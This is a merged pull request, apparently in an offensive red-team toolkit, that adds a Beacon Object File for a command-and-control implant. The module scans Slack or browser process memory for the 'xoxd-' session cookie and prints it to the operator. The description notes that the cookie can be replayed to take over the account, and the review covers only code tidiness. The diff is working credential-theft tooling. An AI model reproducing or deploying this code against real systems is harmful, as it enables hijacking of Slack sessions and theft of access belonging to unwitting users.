### PR TITLE
Add BOF to collect Slack cookies from Slack or browser processes

### PR DESCRIPTION
**Pull request by Tw1sm**
This is basically a clone of the `office_tokens` BOF with very minor modifications to target the Slack `d` cookie, which can be replayed via the browser/desktop app.

### CODE REVIEW

File: src/Remote/slack_cookie/entry.c [hunk 1]
```diff
@@ -0,0 +1,208 @@
...
+    }
+
+    //for (index = 0; index < (address_sz/2)-8; index++)
+    for (index = 0; index < address_sz-5; index++)
+    {
+        // search for xoxd- [78 6f 78 64 2d] 
+        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index);
+            index += MSVCRT$strlen((char *)(buffer + index)) - 1;
```
Comment (freefirex) [inline src/Remote/slack_cookie/entry.c:95]: if you could flip this out to an strnlen using the remainder of the buffer to be examined as the size I'll happily accept this.

The LoadLibrary calls should also have a matching FreeLibrary call.  Msg should call out unable to load kernel32, granted if this bof started running kernel32 should already be loaded in.

**Review by freefirex — CHANGES_REQUESTED** [review]
Thanks for the pull, only one item I'd like to see changed

**Comment by Tw1sm** [comment]
@freefirex Made the suggested changes (thanks again for providing) - let me know if any other edits are needed!

**Comment by freefirex** [comment]
Awesome :100: Merged!

**Pull request merged**